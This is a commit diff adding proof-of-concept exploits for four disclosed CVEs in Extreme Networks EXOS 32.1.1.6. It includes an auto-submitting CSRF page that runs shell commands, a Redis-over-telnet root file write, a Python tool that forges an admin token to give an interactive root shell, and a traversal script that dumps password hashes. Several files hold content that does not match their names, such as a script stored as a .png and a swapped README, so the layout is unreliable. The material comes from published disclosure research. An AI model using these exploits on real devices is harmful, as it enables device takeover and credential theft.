Add EXOS PoCs

Author: DaveYesland

CVE-2023-43118/CVE-2023-43118.html

@@ -0,0 +1,20 @@
+<!--
+Author: Dave Yesland @daveysec with Rhino Security Labs
+CVE: CVE-2023-43118 
+This demonstrates a CSRF vulnerability in Extreme Networks EXOS v32.1.1.6
+Opening this in a browser which is authenticated to an admin account in 
+EXOS Chalet web application will result in code execution on the OS
+using the 'run script shell ls' command via the jsonrpc endpoint.
+-->
+<html>
+  <body>
+    <form action="http://<SERVER_IP_HERE>/jsonrpc/" method="POST" enctype="text/plain">
+      <input type="hidden" name="&#123;&quot;jsonrpc&quot;&#58;&#32;&quot;2&#46;0&quot;&#44;&quot;method&quot;&#58;&#32;&quot;cli&quot;&#44;&quot;params&quot;&#58;&#91;&quot;run&#32;script&#32;shell&#32;ls&quot;&#93;&#44;&quot;id&quot;&#58;&quot;1&quot;&#44;&quot;x&quot;&#58;&quot;" value='"}' />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      history.pushState('', '', '/');
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>

CVE-2023-43118/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-43118: Extreme Networks EXOS CSRF to RCE
+
+## Information
+**Description:** Endpoints of the Chalet application are vulnerable to CSRF allowing a cross-domain request to force an authenticated user to perform actions. This includes the /jsonrpc API which can force an admin user to execute commands on the device (RCE).  
+**Versions Affected:** 32.1.1.6  
+**Version Fixed:** See the vendors advisory  
+**Researcher:** David Yesland (https://twitter.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities  
+**Advisory:** https://extreme-networks.my.site.com/ExtrArticleDetail?an=000114379  
+
+## Proof-of-Concept Exploit
+### Description
+Exploits a CSRF vulnerability against an admin user to run commands on the device.  
+
+### Usage/Exploitation
+As an authenticated admin, load the CSRF POC HTML.  

CVE-2023-43119/CVE-2023-43119.sh

@@ -0,0 +1,12 @@
+#!/bin/bash
+# This is a local exploit which allows an arbitrary file write as the root user
+# by abusing the unauthenticated Redis serer running locally  as root on EXOS
+# Tested on EXOS version 32.1.1.6.
+
+{
+    echo "config set dir /"
+    echo "config set dbfilename \"arbitrary_file\""
+    echo "set test \"some string\""
+    echo "save"
+    echo "quit"
+} | telnet localhost 6379

CVE-2023-43119/README.md

@@ -0,0 +1,19 @@
+# CVE-2023-43119: Extreme Networks EXOS Arbitrary File Write as Root
+
+## Information
+**Description:** It is possible to use telnet to gain privilege escalation via the Redis server to perform arbitrary filesystem operations with root privilege.  
+**Versions Affected:** 32.1.1.6  
+**Version Fixed:** See the vendors advisory  
+**Researcher:** David Yesland (https://twitter.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities  
+**Advisory:** https://extreme-networks.my.site.com/ExtrArticleDetail?an=000114378  
+
+## Proof-of-Concept Exploit
+### Description
+A local Redis server runs on the device with no authentication enabled. This can be abused via telnet by a low privileged user to write files as root.  
+
+### Usage/Exploitation
+Log into the device as a low privileged user and execute the commands in CVE-2023-43119.sh.  
+
+### Screenshot
+![file write](poc_image.png)

CVE-2023-43119/poc_image.png

@@ -0,0 +1,147 @@
+"""
+Author: Dave Yesland @daveysec with Rhino Security Labs
+
+This EXOS exploit will escalate a read-only user to root by exploiting a localhost
+auth bypass vulnerability abusing the web terminal and telnet and a privesc from admin to root.
+
+Tested on EXOS version 32.1.1.6.
+
+This allows a read-only user to run commands as root.
+
+The default user is "user" with and empty password.
+"""
+
+
+from websocket import create_connection
+import argparse
+import requests
+import json
+import re
+
+parser = argparse.ArgumentParser(description="User to admin escalation")
+parser.add_argument("--target", help="Target (http://<ip>)", required=True)
+parser.add_argument("--user", help='Username if different from "user"')
+parser.add_argument("--password", help="Password if different from empty")
+args = parser.parse_args()
+
+target = args.target
+target_host = target.split("//")[1]
+
+if args.user:
+    USER = args.user
+else:
+    USER = "user"
+
+if args.password:
+    PASSWORD = args.password
+else:
+    PASSWORD = ""
+
+# Test the target
+r = requests.get(f"{target}/terminal")
+if r.status_code != 200:
+    print("[!] No /terminal endpoint found on target, exiting...")
+    print("[!] Target does not appear to be vulnerable")
+    exit(1)
+
+attempts = 0
+
+while True:
+    if attempts > 10:
+        print("[!] Exploit failed too many times, exiting...")
+        exit()
+    attempts += 1
+    ws = create_connection(f"ws://{target_host}/ws/_websocket/")
+    result = ws.recv()
+    # Extract the tty session number from the response
+    try:
+        tty = json.loads(result)[1][0].split("/")[2]
+    except IndexError:
+        print("[!] Exploit failed getting tty session, trying again...")
+        continue
+    # Extract the auth token parameter from the response
+    auth_token_param = json.loads(result)[1][0].split("/")[3]
+    # Extract the cookie from the response
+    cookie = json.loads(result)[1][1]
+    print(f"[+] Got terminal cookie: {cookie}")
+    # Add the cookie to the headers
+    extra_headers = {
+        "Cookie": f"PYXTERM_AUTH={cookie}",
+    }
+
+    # Now we can connect to the tty session
+    print(f"[+] Connecting to tty session {tty}...")
+    ws = create_connection(
+        f"ws://{target_host}/ws/_websocket/{tty}/{auth_token_param}", header=extra_headers
+    )
+
+    # Setup the session and receive the responses
+    result = ws.recv()
+    ws.send('["set_size",56,153,954,1278]')
+    result = ws.recv()
+    # Sometimes exploit fails here, if so try again
+    if "disconnect" in result:
+        print("[!] Exploit failed connecting to tty, trying again...")
+        continue
+
+    ws.send(f'["stdin","{USER}\r"]')
+    result = ws.recv()
+    ws.send(f'["stdin","{PASSWORD}\r"]')
+    result = ws.recv()
+    result = ws.recv()
+    if "Login incorrect" in result:
+        print("[!] Exploit failed authenticating, wrong user or password...")
+        exit()
+    result = ws.recv()
+
+    # Send the telnet command to get the admin auth token
+    # This abuses telnet to send an HTTP request to localhost/auth/token
+    # This endpoint considers localhost to be privileged and issues an admin session
+    ws.send(
+        '["stdin","telnet 127.0.0.1:80\nGET /auth/token HTTP/1.1\nHost: 127.0.0.1\n\n"]'
+    )
+    result = ws.recv()
+    result = ws.recv()
+    result = ws.recv()
+    cookies = re.findall(r"Set-Cookie: (.*?);", result)
+    # Sometimes exploit fails here, if so try again
+    if cookies:
+        # Find the admin auth token in the cookies
+        auth_token = [cookie.split("=")[1] for cookie in cookies][0]
+        print(f"[*] Found admin auth token: {auth_token}")
+    else:
+        print(f"[!] Exploit failed getting an admin auth token, trying again...")
+        continue
+
+    # Close out the session
+    # Too many open sessions will prevent more from opening
+    ws.send('["kill_term"]')
+    ws.close()
+    break
+
+# Now we can use the admin cookies to get a shell
+print("[+] Using admin token to get pseudo shell...")
+
+session = requests.session()
+
+burp0_url = f"{target}/jsonrpc/?show"
+burp0_cookies = {"x-auth-token": f"{auth_token}"}
+
+
+def run_cmd(cmd):
+    cmd_json = {
+        "id": "1",
+        "jsonrpc": "2.0",
+        "method": "cli",
+        # \" -d \" allows commands to be executed as root by using the debug flag
+        "params": [f"run script shell {cmd} 2>&1 \" -d\""],
+
+    }
+    r = session.post(burp0_url, cookies=burp0_cookies, json=cmd_json)
+    return r
+
+
+while True:
+    cmd = input("$ ")
+    cmd_result = run_cmd(cmd)
+    print(cmd_result.json()["result"]["CLIoutput"])

CVE-2023-43120/CVE-2023-43120.py

@@ -0,0 +1,29 @@
+# CVE-2023-43120: Extreme Networks EXOS Privilege Escalation from read-only User to Admin
+
+## Information
+**Description:** It is possible to escalate permissions from a user with “read-only” permissions to an administrator “read-write” permissions by using the telnet tool may be used to forge an HTTP request to obtain administrator privilege.  
+**Versions Affected:** 32.1.1.6  
+**Version Fixed:** See the vendors advisory  
+**Researcher:** David Yesland (https://twitter.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities  
+**Advisory:** https://extreme-networks.my.site.com/ExtrArticleDetail?an=000114377  
+
+## Proof-of-Concept Exploit
+### Description
+This abuses the telnet utility on the device to forge an HTTP request to a locally running privileged API and execute commands as root.  
+
+### Usage/Exploitation
+```
+usage: CVE-2023-43120.py [-h] --target TARGET [--user USER] [--password PASSWORD]
+
+User to admin escalation
+
+optional arguments:
+  -h, --help           show this help message and exit
+  --target TARGET      Target (http://<ip>)
+  --user USER          Username if different from "user"
+  --password PASSWORD  Password if different from empty
+```
+
+### Screenshot
+![RCE](poc_image.png)

CVE-2023-43120/README.md

@@ -0,0 +1,77 @@
+"""
+Author: Dave Yesland @daveysec with Rhino Security Labs
+
+This exploits an unauthenticated file read vulnerability in ExtremeXOS tested
+on version 32.1.1.6. The vulnerability is in the /terminal/_static endpoint.
+The endpoint takes a filename parameter and reads the file from the device.
+The filename parameter is not sanitized and allows for directory traversal.
+
+The device uses a primary.cfg file to store the configuration.
+This file contains the user hashes for the device Using the --hashes flag will
+print the user hashes from the device.
+
+Older hashes are stored as MD5Crypt.
+newer hashes are stored as SHA-256.
+"""
+
+import requests
+import argparse
+from xml.etree import ElementTree as ET
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-f", "--file", help="File to read")
+parser.add_argument("-t", "--target", help="EXOS Target (http://<ip>)", required=True)
+parser.add_argument("-o", "--output", help="Output file to write contents to")
+parser.add_argument(
+    "--hashes", help="Just get the user hashes from the device", action="store_true"
+)
+args = parser.parse_args()
+
+file_to_read = args.file
+target = args.target
+output = args.output
+
+TRAVERSAL_SEQUENCE = "../../../../../.."
+MAIN_CONFIG_FILE = "/config/primary.cfg"
+
+
+def read_file(file_path):
+    """
+    read the file from the device
+    """
+    r = requests.get(
+        f"{target}/terminal/_static?filename={TRAVERSAL_SEQUENCE}{file_path}"
+    )
+    return r
+
+
+def get_hashes(xml):
+    """
+    parse the primary.cfg file and get the user hashes
+    """
+    root = ET.fromstring(xml)
+    accounts = root.findall("xos-module-aaa/account")
+    for account in accounts:
+        username = account.find("name").text
+        password_hash = account.find("password").text
+        print(f"{username}:{password_hash}")
+
+
+# If no file is specified or --hashes, use the default
+if not file_to_read or args.hashes:
+    file_to_read = f"{MAIN_CONFIG_FILE}"
+
+# If hashes just print the users and hashes from primary.cfg and exit
+if args.hashes:
+    print("[+] Attempting to get user hashes from primary.cfg...")
+    get_hashes(read_file(file_to_read).content)
+    exit()
+# If output is specified, write the file to disk
+if output:
+    with open(output, "wb") as f:
+        print(f"[+] Attempting to read {file_to_read}...")
+        f.write(read_file(file_to_read).content)
+        print(f"[+] File {file_to_read} saved to {output}")
+# If no output is specified, print the file contents to the screen
+else:
+    print(read_file(file_to_read).text)

CVE-2023-43120/poc_image.png

@@ -0,0 +1,30 @@
+# CVE-2023-43121: Extreme Networks EXOS Unauthenticated File Read
+
+## Information
+**Description:** A directory traversal vulnerability in the Chalet application in EXOS allows any file on the system to be read.  
+**Versions Affected:** 32.1.1.6  
+**Version Fixed:** See the vendors advisory  
+**Researcher:** David Yesland (https://twitter.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities  
+**Advisory:** https://extreme-networks.my.site.com/ExtrArticleDetail?an=000114376  
+
+## Proof-of-Concept Exploit
+### Description
+Explain why/how the exploit works.  
+
+### Usage/Exploitation
+```
+usage: CVE-2023-43121.py [-h] [-f FILE] -t TARGET [-o OUTPUT] [--hashes]
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -f FILE, --file FILE  File to read
+  -t TARGET, --target TARGET
+                        EXOS Target (http://<ip>)
+  -o OUTPUT, --output OUTPUT
+                        Output file to write contents to
+  --hashes              Just get the user hashes from the device
+```  
+
+### Screenshot
+![file read](poc_image.png)